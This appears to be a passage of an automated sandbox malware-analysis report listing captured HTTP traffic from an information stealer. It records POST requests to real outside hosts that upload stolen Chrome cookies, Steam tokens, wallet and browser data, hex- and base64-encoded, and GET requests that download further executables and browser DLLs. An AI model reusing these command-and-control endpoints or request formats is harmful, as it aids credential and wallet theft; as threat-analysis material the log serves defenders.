Source: global traffic HTTP traffic detected: POST /2fb6c2cc8dce150a.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DGCGDBGCAAEBFIECGHDGHost: 185.215.113.17Content-Length: 751Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 47 43 47 44 42 47 43 41 41 45 42 46 49 45 43 47 48 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 33 35 30 63 30 62 37 31 65 63 61 62 35 61 62 32 37 34 66 35 66 62 61 63 38 64 66 65 36 34 64 38 62 31 31 32 35 32 38 31 37 61 61 32 63 36 32 62 38 64 61 34 39 64 37 35 31 66 33 32 36 38 32 65 64 61 61 65 32 63 63 0d 0a 2d 2d 2d 2d 2d 2d 44 47 43 47 44 42 47 43 41 41 45 42 46 49 45 43 47 48 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 44 47 43 47 44 42 47 43 41 41 45 42 46 49 45 43 47 48 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 52 6b 46 4d 55 30 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 7a 45 79 4d 6a 6b 77 4f 44 41 79 43 55 35 4a 52 41 6b 31 4d 54 45 39 56 55 4a 6c 54 6b 4e 72 57 6a 4e 4d 4f 48 6c 59 59 33 67 34 63 57 67 30 53 6b 5a 56 57 47 74 33 61 30 35 44 4f 55 6c 79 5a 47 6c 53 5a 47 4a 71 55 31 52 71 63 56 4e 70 52 6d 67 34 56 33 4a 53 59 32 4a 4c 63 6c 39 79 54 30 70 69 5a 30 68 5a 4e 6c 52 42 4e 46 4a 55 4c 54 5a 77 63 7a 42 69 61 47 56 74 5a 6e 64 44 55 45 4a 7a 54 45 31 6e 55 46 51 33 4c 57 64 55 59 31 64 78 53 48 5a 61 64 6c 70 69 59 57 5a 50 63 47 74 78 55 6e 6b 77 5a 45 78 35 57 55 63 35 51 57 70 51 4d 6e 5a 69 56 55 4a 76 62 57 46 79 62 6d 4d 35 63 47 
4e 61 56 6d 78 6f 53 47 74 56 5a 56 56 68 56 30 31 31 63 6b 51 77 52 30 64 59 65 56 63 77 4e 56 39 43 58 7a 46 4a 65 56 56 4f 57 55 56 46 54 47 31 35 63 56 4a 6e 43 69 35 6e 62 32 39 6e 62 47 55 75 59 32 39 74 43 56 52 53 56 55 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 6a 6b 35 4d 44 63 78 4e 6a 51 77 43 54 46 51 58 30 70 42 55 67 6b 79 4d 44 49 7a 4c 54 45 77 4c 54 41 31 4c 54 41 32 43 67 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 44 47 43 47 44 42 47 43 41 41 45 42 46 49 45 43 47 48 44 47 2d 2d 0d 0a Data Ascii: ------DGCGDBGCAAEBFIECGHDGContent-Disposition: form-data; name="token"3350c0b71ecab5ab274f5fbac8dfe64d8b11252817aa2c62b8da49d751f32682edaae2cc------DGCGDBGCAAEBFIECGHDGContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------DGCGDBGCAAEBFIECGHDGContent-Disposition: form-data; name="file"Lmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMjkwODAyCU5JRAk1MTE9VUJlTkNrWjNMOHlYY3g4cWg0SkZVWGt3a05DOUlyZGlSZGJqU1RqcVNpRmg4V3JSY2JLcl9yT0piZ0hZNlRBNFJULTZwczBiaGVtZndDUEJzTE1nU
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 31 39 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000191001&unit=246122658369
Source: global traffic HTTP traffic detected: POST /2fb6c2cc8dce150a.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KECFCGHIDHCAKEBFCFHCHost: 185.215.113.17Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 45 43 46 43 47 48 49 44 48 43 41 4b 45 42 46 43 46 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 33 35 30 63 30 62 37 31 65 63 61 62 35 61 62 32 37 34 66 35 66 62 61 63 38 64 66 65 36 34 64 38 62 31 31 32 35 32 38 31 37 61 61 32 63 36 32 62 38 64 61 34 39 64 37 35 31 66 33 32 36 38 32 65 64 61 61 65 32 63 63 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 43 46 43 47 48 49 44 48 43 41 4b 45 42 46 43 46 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 43 46 43 47 48 49 44 48 43 41 4b 45 42 46 43 46 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 43 46 43 47 48 49 44 48 43 41 4b 45 42 46 43 46 48 43 2d 2d 0d 0a Data Ascii: ------KECFCGHIDHCAKEBFCFHCContent-Disposition: form-data; name="token"3350c0b71ecab5ab274f5fbac8dfe64d8b11252817aa2c62b8da49d751f32682edaae2cc------KECFCGHIDHCAKEBFCFHCContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------KECFCGHIDHCAKEBFCFHCContent-Disposition: form-data; name="file"------KECFCGHIDHCAKEBFCFHC--
Source: global traffic HTTP traffic detected: GET /inc/penis.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /2fb6c2cc8dce150a.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CAEBGHDBKEBGIDHJJEHCHost: 185.215.113.17Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 41 45 42 47 48 44 42 4b 45 42 47 49 44 48 4a 4a 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 33 35 30 63 30 62 37 31 65 63 61 62 35 61 62 32 37 34 66 35 66 62 61 63 38 64 66 65 36 34 64 38 62 31 31 32 35 32 38 31 37 61 61 32 63 36 32 62 38 64 61 34 39 64 37 35 31 66 33 32 36 38 32 65 64 61 61 65 32 63 63 0d 0a 2d 2d 2d 2d 2d 2d 43 41 45 42 47 48 44 42 4b 45 42 47 49 44 48 4a 4a 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 43 41 45 42 47 48 44 42 4b 45 42 47 49 44 48 4a 4a 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 43 41 45 42 47 48 44 42 4b 45 42 47 49 44 48 4a 4a 45 48 43 2d 2d 0d 0a Data Ascii: ------CAEBGHDBKEBGIDHJJEHCContent-Disposition: form-data; name="token"3350c0b71ecab5ab274f5fbac8dfe64d8b11252817aa2c62b8da49d751f32682edaae2cc------CAEBGHDBKEBGIDHJJEHCContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------CAEBGHDBKEBGIDHJJEHCContent-Disposition: form-data; name="file"------CAEBGHDBKEBGIDHJJEHC--
Source: global traffic HTTP traffic detected: GET /f1ddeb6592c03206/freebl3.dll HTTP/1.1Host: 185.215.113.17Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 32 35 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000254001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /f1ddeb6592c03206/mozglue.dll HTTP/1.1Host: 185.215.113.17Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /inc/crypted.exe HTTP/1.1Host: 185.215.113.117
Source: global traffic HTTP traffic detected: GET /f1ddeb6592c03206/msvcp140.dll HTTP/1.1Host: 185.215.113.17Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /f1ddeb6592c03206/nss3.dll HTTP/1.1Host: 185.215.113.17Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 32 39 30 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000290001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /inc/LummaC222222.exe HTTP/1.1Host: 185.215.113.117
Source: global traffic HTTP traffic detected: GET /f1ddeb6592c03206/softokn3.dll HTTP/1.1Host: 185.215.113.17Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 33 31 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000314001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /f1ddeb6592c03206/vcruntime140.dll HTTP/1.1Host: 185.215.113.17Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /inc/newbundle2.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /2fb6c2cc8dce150a.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AAKJEGCFBGDHJJJJJKJEHost: 185.215.113.17Content-Length: 947Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /2fb6c2cc8dce150a.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JEBKKEGDBFIIEBFHIEHCHost: 185.215.113.17Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 45 42 4b 4b 45 47 44 42 46 49 49 45 42 46 48 49 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 33 35 30 63 30 62 37 31 65 63 61 62 35 61 62 32 37 34 66 35 66 62 61 63 38 64 66 65 36 34 64 38 62 31 31 32 35 32 38 31 37 61 61 32 63 36 32 62 38 64 61 34 39 64 37 35 31 66 33 32 36 38 32 65 64 61 61 65 32 63 63 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 42 4b 4b 45 47 44 42 46 49 49 45 42 46 48 49 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 42 4b 4b 45 47 44 42 46 49 49 45 42 46 48 49 45 48 43 2d 2d 0d 0a Data Ascii: ------JEBKKEGDBFIIEBFHIEHCContent-Disposition: form-data; name="token"3350c0b71ecab5ab274f5fbac8dfe64d8b11252817aa2c62b8da49d751f32682edaae2cc------JEBKKEGDBFIIEBFHIEHCContent-Disposition: form-data; name="message"wallets------JEBKKEGDBFIIEBFHIEHC--
Source: global traffic HTTP traffic detected: POST /2fb6c2cc8dce150a.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IIJEBFCFIJJJEBGDBAKEHost: 185.215.113.17Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 49 4a 45 42 46 43 46 49 4a 4a 4a 45 42 47 44 42 41 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 33 35 30 63 30 62 37 31 65 63 61 62 35 61 62 32 37 34 66 35 66 62 61 63 38 64 66 65 36 34 64 38 62 31 31 32 35 32 38 31 37 61 61 32 63 36 32 62 38 64 61 34 39 64 37 35 31 66 33 32 36 38 32 65 64 61 61 65 32 63 63 0d 0a 2d 2d 2d 2d 2d 2d 49 49 4a 45 42 46 43 46 49 4a 4a 4a 45 42 47 44 42 41 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 49 49 4a 45 42 46 43 46 49 4a 4a 4a 45 42 47 44 42 41 4b 45 2d 2d 0d 0a Data Ascii: ------IIJEBFCFIJJJEBGDBAKEContent-Disposition: form-data; name="token"3350c0b71ecab5ab274f5fbac8dfe64d8b11252817aa2c62b8da49d751f32682edaae2cc------IIJEBFCFIJJJEBGDBAKEContent-Disposition: form-data; name="message"files------IIJEBFCFIJJJEBGDBAKE--
Source: global traffic HTTP traffic detected: POST /2fb6c2cc8dce150a.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IDAAFBGDBKJJJKFIIIJJHost: 185.215.113.17Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 44 41 41 46 42 47 44 42 4b 4a 4a 4a 4b 46 49 49 49 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 33 35 30 63 30 62 37 31 65 63 61 62 35 61 62 32 37 34 66 35 66 62 61 63 38 64 66 65 36 34 64 38 62 31 31 32 35 32 38 31 37 61 61 32 63 36 32 62 38 64 61 34 39 64 37 35 31 66 33 32 36 38 32 65 64 61 61 65 32 63 63 0d 0a 2d 2d 2d 2d 2d 2d 49 44 41 41 46 42 47 44 42 4b 4a 4a 4a 4b 46 49 49 49 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 44 41 41 46 42 47 44 42 4b 4a 4a 4a 4b 46 49 49 49 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 49 44 41 41 46 42 47 44 42 4b 4a 4a 4a 4b 46 49 49 49 4a 4a 2d 2d 0d 0a Data Ascii: ------IDAAFBGDBKJJJKFIIIJJContent-Disposition: form-data; name="token"3350c0b71ecab5ab274f5fbac8dfe64d8b11252817aa2c62b8da49d751f32682edaae2cc------IDAAFBGDBKJJJKFIIIJJContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------IDAAFBGDBKJJJKFIIIJJContent-Disposition: form-data; name="file"------IDAAFBGDBKJJJKFIIIJJ--
Source: global traffic HTTP traffic detected: POST /2fb6c2cc8dce150a.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AAEHJEGIIDAECAAKEBKFHost: 185.215.113.17Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 41 45 48 4a 45 47 49 49 44 41 45 43 41 41 4b 45 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 33 35 30 63 30 62 37 31 65 63 61 62 35 61 62 32 37 34 66 35 66 62 61 63 38 64 66 65 36 34 64 38 62 31 31 32 35 32 38 31 37 61 61 32 63 36 32 62 38 64 61 34 39 64 37 35 31 66 33 32 36 38 32 65 64 61 61 65 32 63 63 0d 0a 2d 2d 2d 2d 2d 2d 41 41 45 48 4a 45 47 49 49 44 41 45 43 41 41 4b 45 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 41 41 45 48 4a 45 47 49 49 44 41 45 43 41 41 4b 45 42 4b 46 2d 2d 0d 0a Data Ascii: ------AAEHJEGIIDAECAAKEBKFContent-Disposition: form-data; name="token"3350c0b71ecab5ab274f5fbac8dfe64d8b11252817aa2c62b8da49d751f32682edaae2cc------AAEHJEGIIDAECAAKEBKFContent-Disposition: form-data; name="message"ybncbhylepme------AAEHJEGIIDAECAAKEBKF--
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 33 32 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000322001&unit=246122658369
Source: global traffic HTTP traffic detected: POST /2fb6c2cc8dce150a.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KJJKEBGHJKFIDGCAAFCAHost: 185.215.113.17Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4a 4a 4b 45 42 47 48 4a 4b 46 49 44 47 43 41 41 46 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 33 35 30 63 30 62 37 31 65 63 61 62 35 61 62 32 37 34 66 35 66 62 61 63 38 64 66 65 36 34 64 38 62 31 31 32 35 32 38 31 37 61 61 32 63 36 32 62 38 64 61 34 39 64 37 35 31 66 33 32 36 38 32 65 64 61 61 65 32 63 63 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4a 4b 45 42 47 48 4a 4b 46 49 44 47 43 41 41 46 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4a 4b 45 42 47 48 4a 4b 46 49 44 47 43 41 41 46 43 41 2d 2d 0d 0a Data Ascii: ------KJJKEBGHJKFIDGCAAFCAContent-Disposition: form-data; name="token"3350c0b71ecab5ab274f5fbac8dfe64d8b11252817aa2c62b8da49d751f32682edaae2cc------KJJKEBGHJKFIDGCAAFCAContent-Disposition: form-data; name="message"wkkjqaiaxkhb------KJJKEBGHJKFIDGCAAFCA--
Source: global traffic HTTP traffic detected: GET /inc/rstxdhuj.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.202.233.158Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /e96ea2db21fa9a1b.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CBFCBKKFBAEHJKEBKFCBHost: 91.202.233.158Content-Length: 214Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 42 46 43 42 4b 4b 46 42 41 45 48 4a 4b 45 42 4b 46 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 39 35 45 30 31 35 42 38 41 39 38 32 33 33 33 33 36 34 31 39 32 0d 0a 2d 2d 2d 2d 2d 2d 43 42 46 43 42 4b 4b 46 42 41 45 48 4a 4b 45 42 4b 46 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 0d 0a 2d 2d 2d 2d 2d 2d 43 42 46 43 42 4b 4b 46 42 41 45 48 4a 4b 45 42 4b 46 43 42 2d 2d 0d 0a Data Ascii: ------CBFCBKKFBAEHJKEBKFCBContent-Disposition: form-data; name="hwid"A95E015B8A982333364192------CBFCBKKFBAEHJKEBKFCBContent-Disposition: form-data; name="build"default------CBFCBKKFBAEHJKEBKFCB--
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 33 34 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000342001&unit=246122658369
Source: global traffic HTTP traffic detected: POST /e96ea2db21fa9a1b.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IDHIEBAAKJDHIECAAFHCHost: 91.202.233.158Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 44 48 49 45 42 41 41 4b 4a 44 48 49 45 43 41 41 46 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 37 38 35 32 36 31 30 35 64 63 64 65 38 31 35 63 34 62 63 63 37 32 64 64 34 39 63 62 34 66 32 35 62 35 38 37 37 33 62 39 63 61 34 64 31 39 31 66 62 35 35 61 38 35 64 64 62 35 66 63 38 61 37 62 38 65 61 65 35 65 66 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 49 45 42 41 41 4b 4a 44 48 49 45 43 41 41 46 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 49 45 42 41 41 4b 4a 44 48 49 45 43 41 41 46 48 43 2d 2d 0d 0a Data Ascii: ------IDHIEBAAKJDHIECAAFHCContent-Disposition: form-data; name="token"d78526105dcde815c4bcc72dd49cb4f25b58773b9ca4d191fb55a85ddb5fc8a7b8eae5ef------IDHIEBAAKJDHIECAAFHCContent-Disposition: form-data; name="message"browsers------IDHIEBAAKJDHIECAAFHC--
Source: global traffic HTTP traffic detected: POST /e96ea2db21fa9a1b.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BFBKFHIDHIIJJKECGHCFHost: 91.202.233.158Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 46 42 4b 46 48 49 44 48 49 49 4a 4a 4b 45 43 47 48 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 37 38 35 32 36 31 30 35 64 63 64 65 38 31 35 63 34 62 63 63 37 32 64 64 34 39 63 62 34 66 32 35 62 35 38 37 37 33 62 39 63 61 34 64 31 39 31 66 62 35 35 61 38 35 64 64 62 35 66 63 38 61 37 62 38 65 61 65 35 65 66 0d 0a 2d 2d 2d 2d 2d 2d 42 46 42 4b 46 48 49 44 48 49 49 4a 4a 4b 45 43 47 48 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 42 46 42 4b 46 48 49 44 48 49 49 4a 4a 4b 45 43 47 48 43 46 2d 2d 0d 0a Data Ascii: ------BFBKFHIDHIIJJKECGHCFContent-Disposition: form-data; name="token"d78526105dcde815c4bcc72dd49cb4f25b58773b9ca4d191fb55a85ddb5fc8a7b8eae5ef------BFBKFHIDHIIJJKECGHCFContent-Disposition: form-data; name="message"plugins------BFBKFHIDHIIJJKECGHCF--
Source: global traffic HTTP traffic detected: POST /e96ea2db21fa9a1b.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IJJJKEGHJKFHJKFHDHCFHost: 91.202.233.158Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 4a 4a 4a 4b 45 47 48 4a 4b 46 48 4a 4b 46 48 44 48 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 37 38 35 32 36 31 30 35 64 63 64 65 38 31 35 63 34 62 63 63 37 32 64 64 34 39 63 62 34 66 32 35 62 35 38 37 37 33 62 39 63 61 34 64 31 39 31 66 62 35 35 61 38 35 64 64 62 35 66 63 38 61 37 62 38 65 61 65 35 65 66 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4a 4a 4b 45 47 48 4a 4b 46 48 4a 4b 46 48 44 48 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4a 4a 4b 45 47 48 4a 4b 46 48 4a 4b 46 48 44 48 43 46 2d 2d 0d 0a Data Ascii: ------IJJJKEGHJKFHJKFHDHCFContent-Disposition: form-data; name="token"d78526105dcde815c4bcc72dd49cb4f25b58773b9ca4d191fb55a85ddb5fc8a7b8eae5ef------IJJJKEGHJKFHJKFHDHCFContent-Disposition: form-data; name="message"fplugins------IJJJKEGHJKFHJKFHDHCF--
Source: global traffic HTTP traffic detected: GET /inc/cccc2.exe HTTP/1.1Host: 185.215.113.16
